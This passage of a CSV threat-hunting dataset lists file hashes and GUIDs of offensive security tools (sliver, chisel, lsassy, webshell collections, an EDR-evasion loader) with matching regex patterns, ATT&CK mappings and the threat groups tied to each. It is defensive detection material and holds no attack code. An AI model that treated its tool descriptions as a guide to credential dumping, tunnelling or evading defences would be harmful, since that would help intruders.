#linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","21670" "*0DF38AD4-60AF-4F93-9C7A-7FB7BA692017*",".{0,1000}0DF38AD4\-60AF\-4F93\-9C7A\-7FB7BA692017.{0,1000}","offensive_tool_keyword","Volumiser","Volumiser is a command line tool and interactive console GUI for listing - browsing and extracting files from common virtual machine hard disk image formats.","T1560.001 - T1059 - T1114 - T1005","TA0005 - TA0009","N/A","N/A","Collection","https://github.com/CCob/Volumiser","1","0","#GUIDproject","N/A","7","4","379","42","2025-04-22T15:47:53Z","2022-11-08T21:38:56Z","21671" "*0df3b8f4bb74d6867ee75afc9c79f76e6ceb4d1ebc7b708cc7b137791d6d15d3*",".{0,1000}0df3b8f4bb74d6867ee75afc9c79f76e6ceb4d1ebc7b708cc7b137791d6d15d3.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","21672" "*0DF612AE-47D8-422C-B0C5-0727EA60784F*",".{0,1000}0DF612AE\-47D8\-422C\-B0C5\-0727EA60784F.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","#GUIDproject","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","21673" "*0dfd57cb8299edf2e4a941d39ba787960de83f00b57c4f885bb141782a3b559b*",".{0,1000}0dfd57cb8299edf2e4a941d39ba787960de83f00b57c4f885bb141782a3b559b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - 
TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21675" "*0e0ea3fcb913470c6f7814cc1d943d51f687578f2d59a1a15101587cb0ff709d*",".{0,1000}0e0ea3fcb913470c6f7814cc1d943d51f687578f2d59a1a15101587cb0ff709d.{0,1000}","offensive_tool_keyword","subbrute","A DNS meta-query spider that enumerates DNS records and subdomains.","T1071.001 - T1083 - T1590.001","TA0043 - TA0007?","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/TheRook/subbrute","1","0","#filehash","N/A","5","10","3422","661","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z","21677" "*0e17084a14b6af8e50ae4917261546121279fd94299bea1f5fcaa77f18a0feaf*",".{0,1000}0e17084a14b6af8e50ae4917261546121279fd94299bea1f5fcaa77f18a0feaf.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","21682" "*0e2229f85a0dca6457d05a619627075db242eb3fd0080d9a8fe8c102ce5fb71e*",".{0,1000}0e2229f85a0dca6457d05a619627075db242eb3fd0080d9a8fe8c102ce5fb71e.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21684" "*0e26255b8db0b2e2792225febc5d3adeebc02edff523e90156c76b5baf7ee9b3*",".{0,1000}0e26255b8db0b2e2792225febc5d3adeebc02edff523e90156c76b5baf7ee9b3.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and 
make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","21685" "*0e2a30af2c626fd1f134d32daf8d615bfae7568fd43484e5f5fc489ceb0b2faf*",".{0,1000}0e2a30af2c626fd1f134d32daf8d615bfae7568fd43484e5f5fc489ceb0b2faf.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#filehash","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","21686" "*0e2c629c26b6fc61459dc59764df329ad9d2bc80a9beee2063cdd1b5d30b2245*",".{0,1000}0e2c629c26b6fc61459dc59764df329ad9d2bc80a9beee2063cdd1b5d30b2245.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","21687" "*0e2e712fe0bc1ddddc027c85d701be1175a3fc75fddb0a599dcd065d6385e0cb*",".{0,1000}0e2e712fe0bc1ddddc027c85d701be1175a3fc75fddb0a599dcd065d6385e0cb.{0,1000}","offensive_tool_keyword","ElusiveMice","Cobalt Strike User-Defined Reflective Loader with AV/EDR Evasion in mind","T1620 - T1055.012 - T1202","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/mgeeky/ElusiveMice","1","0","#filehash","N/A","10","5","449","78","2023-07-12T17:54:07Z","2021-08-27T19:22:20Z","21688" 
"*0e2e76930ff8d2bea66b82db863243f3895d39e761893eb6de025325747774b6*",".{0,1000}0e2e76930ff8d2bea66b82db863243f3895d39e761893eb6de025325747774b6.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","21689" "*0e313d439e080ae59303f87afe484717dab784c8df5f83dcd2745b51194582a8*",".{0,1000}0e313d439e080ae59303f87afe484717dab784c8df5f83dcd2745b51194582a8.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","0","#filehash","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","21690" "*0e313d439e080ae59303f87afe484717dab784c8df5f83dcd2745b51194582a8*",".{0,1000}0e313d439e080ae59303f87afe484717dab784c8df5f83dcd2745b51194582a8.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","0","#filehash","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","21691" "*0e34604b09472922b088573ae7b8a2686982b05900251f861912e3d9d2760980*",".{0,1000}0e34604b09472922b088573ae7b8a2686982b05900251f861912e3d9d2760980.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux 
#windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21692" "*0e3c7a01a06f011d9bb7e184d4713f88bbb3def0118e70e2f58ca79966b7c067*",".{0,1000}0e3c7a01a06f011d9bb7e184d4713f88bbb3def0118e70e2f58ca79966b7c067.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","21693" "*0e3e7f92c7f8f10535a6a15079813e2b8a3f5e4cfc00a275d2a2e917539306d2*",".{0,1000}0e3e7f92c7f8f10535a6a15079813e2b8a3f5e4cfc00a275d2a2e917539306d2.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","21694" "*0e411f4a58f7ca4e77a39c810bd1cb44eca9f8cbae2a20d1c3ed6d3f1b9c4f81*",".{0,1000}0e411f4a58f7ca4e77a39c810bd1cb44eca9f8cbae2a20d1c3ed6d3f1b9c4f81.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","21695" "*0E423DD6-FAAF-4A66-8828-6A5A5F22269B*",".{0,1000}0E423DD6\-FAAF\-4A66\-8828\-6A5A5F22269B.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - 
T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","21696" "*0e452eb513a7218f3c9b38ba5e6fd89e3f78fa8ef27996de7e33810302b98bd8*",".{0,1000}0e452eb513a7218f3c9b38ba5e6fd89e3f78fa8ef27996de7e33810302b98bd8.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","21697" "*0E4BAB8F-E6E0-47A8-8E99-8D451839967E*",".{0,1000}0E4BAB8F\-E6E0\-47A8\-8E99\-8D451839967E.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","#GUIDproject","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","21698" "*0e4d9ac31eb73e737d91d48b2c1a461798bf1773775e32a7bc508d3ed2460145*",".{0,1000}0e4d9ac31eb73e737d91d48b2c1a461798bf1773775e32a7bc508d3ed2460145.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","21699" 
"*0e5ae252e2597d44f6e8def9fcdd3562954130a0261776e083959d067795c450*",".{0,1000}0e5ae252e2597d44f6e8def9fcdd3562954130a0261776e083959d067795c450.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","0","#filehash","N/A","10","3","214","42","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z","21700" "*0e6425e589ee42d3d26e329534717ccab8113b6015841d3ab90cf23f56e37b0f*",".{0,1000}0e6425e589ee42d3d26e329534717ccab8113b6015841d3ab90cf23f56e37b0f.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","21703" "*0e643bd5e3eaf43f5eee053904a24dac9bf05150885fcb32a606ef3ee1c7db1f*",".{0,1000}0e643bd5e3eaf43f5eee053904a24dac9bf05150885fcb32a606ef3ee1c7db1f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21704" 
"*0e66df39efd2c71fc83017fd98bf187558a1793a06b8164f46561d28fc5e3e50*",".{0,1000}0e66df39efd2c71fc83017fd98bf187558a1793a06b8164f46561d28fc5e3e50.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","21705" "*0e744d477bb40e89af274ecf70c339b9674699e4bfe984b5dd73a2b877369d48*",".{0,1000}0e744d477bb40e89af274ecf70c339b9674699e4bfe984b5dd73a2b877369d48.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21709" "*0e78fbbb84802086667efb08bed9f8773b86d9223b90599c33baee0ed26b761e*",".{0,1000}0e78fbbb84802086667efb08bed9f8773b86d9223b90599c33baee0ed26b761e.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21710" "*0E7A579798A6A57A88C6CBD5C67313E43B8F7D84DF4798C88142B134D48C263B*",".{0,1000}0E7A579798A6A57A88C6CBD5C67313E43B8F7D84DF4798C88142B134D48C263B.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation 
tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","21711" "*0e7e01f0f50a6cd3bd6f7e76944d133405423317d747b62cc94b1ad1f6e923b3*",".{0,1000}0e7e01f0f50a6cd3bd6f7e76944d133405423317d747b62cc94b1ad1f6e923b3.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","21712" "*0e83bafb7d54823e22c5fa5ff502924afb30c090471dcb9ba1c454b62ed5ca55*",".{0,1000}0e83bafb7d54823e22c5fa5ff502924afb30c090471dcb9ba1c454b62ed5ca55.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","21714" "*0e8ad3e18880129b9042c97c891691f1437dd648a58480e0d4448a98718edbbf*",".{0,1000}0e8ad3e18880129b9042c97c891691f1437dd648a58480e0d4448a98718edbbf.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","21715" "*0e8dfd9cc5fcd99e4ee93d4c015e49dd672ac1813c0270c4ff3ed8c1b9db85d1*",".{0,1000}0e8dfd9cc5fcd99e4ee93d4c015e49dd672ac1813c0270c4ff3ed8c1b9db85d1.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 
- T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","#filehash","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","21717" "*0e8eff9d7c2a6d2cfa40a7530753cccffc959186c9e1a89eb623e2dd5bdcef6d*",".{0,1000}0e8eff9d7c2a6d2cfa40a7530753cccffc959186c9e1a89eb623e2dd5bdcef6d.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","21718" "*0e95446bac57b2a3276703c700865bf025f1eac27bc5c9ebcf820c1e351b6732*",".{0,1000}0e95446bac57b2a3276703c700865bf025f1eac27bc5c9ebcf820c1e351b6732.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","21720" "*0e9af89e0f2faa8d7f92d6e9538e19f82c701c798031d890978845e388b85ba6*",".{0,1000}0e9af89e0f2faa8d7f92d6e9538e19f82c701c798031d890978845e388b85ba6.{0,1000}","offensive_tool_keyword","ACEshark","uncover potential privilege escalation vectors by analyzing windows service configurations and Access Control Entries","T1058 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/t3l3machus/ACEshark","1","0","#filehash","N/A","6","2","109","19","2025-01-15T07:01:48Z","2024-12-28T10:42:29Z","21723" "*0ea533dd75837182416f5ffa7f51a36d82c407587068d0404c177f18709ffa63*",".{0,1000}0ea533dd75837182416f5ffa7f51a36d82c407587068d0404c177f18709ffa63.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21725" "*0eb04b75544e35cb6a285c97bbefa557050848d73ad9f8e7ff7a36ee7a36a68d*",".{0,1000}0eb04b75544e35cb6a285c97bbefa557050848d73ad9f8e7ff7a36ee7a36a68d.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","21727" 
"*0ebce776a2758cb99ecc9a6ba97fc432e40925fbe1a4e068bbc7a273f6064269*",".{0,1000}0ebce776a2758cb99ecc9a6ba97fc432e40925fbe1a4e068bbc7a273f6064269.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21729" "*0ec459ed281c0ee777046a0a31b59500843a74f776a459a12438d6412f146001*",".{0,1000}0ec459ed281c0ee777046a0a31b59500843a74f776a459a12438d6412f146001.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21730" "*0ecd88de5d2728034f25bc04fcf9553198453fb46bbb93a00a74e6e74747435b*",".{0,1000}0ecd88de5d2728034f25bc04fcf9553198453fb46bbb93a00a74e6e74747435b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21732" "*0ed6cbbe7b625c83c55e0cdb90f138301afc88e23d04e32eed39b078f7c2fa11*",".{0,1000}0ed6cbbe7b625c83c55e0cdb90f138301afc88e23d04e32eed39b078f7c2fa11.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21736" 
"*0ed7071221412e55b8fa13a88d21ef523186e621acfb3cf3fe0dd292c0a25951*",".{0,1000}0ed7071221412e55b8fa13a88d21ef523186e621acfb3cf3fe0dd292c0a25951.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21737" "*0ed8c3f90c77356f7d02574491f66586b96552efd0b6ef53d7de263893061bc5*",".{0,1000}0ed8c3f90c77356f7d02574491f66586b96552efd0b6ef53d7de263893061bc5.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","21738" "*0ed9e5a905e2ec8e15e331561cc665ad5b5c5fe3ec34ffacea54b6ee51244b5c*",".{0,1000}0ed9e5a905e2ec8e15e331561cc665ad5b5c5fe3ec34ffacea54b6ee51244b5c.{0,1000}","offensive_tool_keyword","ROADtoken","Abusing Azure AD SSO with the Primary Refresh Token - ROADtoken is a tool that uses the BrowserCore.exe binary to obtain a cookie that can be used with SSO and Azure AD","T1557 - T1078 - T1071.001 - T1552.001","TA0006 ","N/A","N/A","Credential Access","https://github.com/dirkjanm/ROADtoken","1","0","#filehash","N/A","7","1","89","17","2020-09-30T16:18:47Z","2020-07-21T12:42:14Z","21739" 
"*0ee13a1dc80aea39fb3306a3989be1fd14975cdad77b5e470946473e2024f4b0*",".{0,1000}0ee13a1dc80aea39fb3306a3989be1fd14975cdad77b5e470946473e2024f4b0.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","21740" "*0ee4ed7184673d6fc1163f85c3da8a78f5aa1464eda290697a903c5adb7b0006*",".{0,1000}0ee4ed7184673d6fc1163f85c3da8a78f5aa1464eda290697a903c5adb7b0006.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21741" "*0eec76148fd7a3b1eb54d3fa71c30b5370d410e1eb81231ff0e9e66de3598aea*",".{0,1000}0eec76148fd7a3b1eb54d3fa71c30b5370d410e1eb81231ff0e9e66de3598aea.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/outflanknl/PrintNightmare","1","0","#filehash","N/A","10","4","337","67","2021-09-13T08:45:26Z","2021-09-13T08:44:02Z","21742" "*0eed39829e042cf451ff602078fc3ffcbcfff075bbd3c4a33ccd26e44a31a9fa*",".{0,1000}0eed39829e042cf451ff602078fc3ffcbcfff075bbd3c4a33ccd26e44a31a9fa.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#filehash","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","21743" 
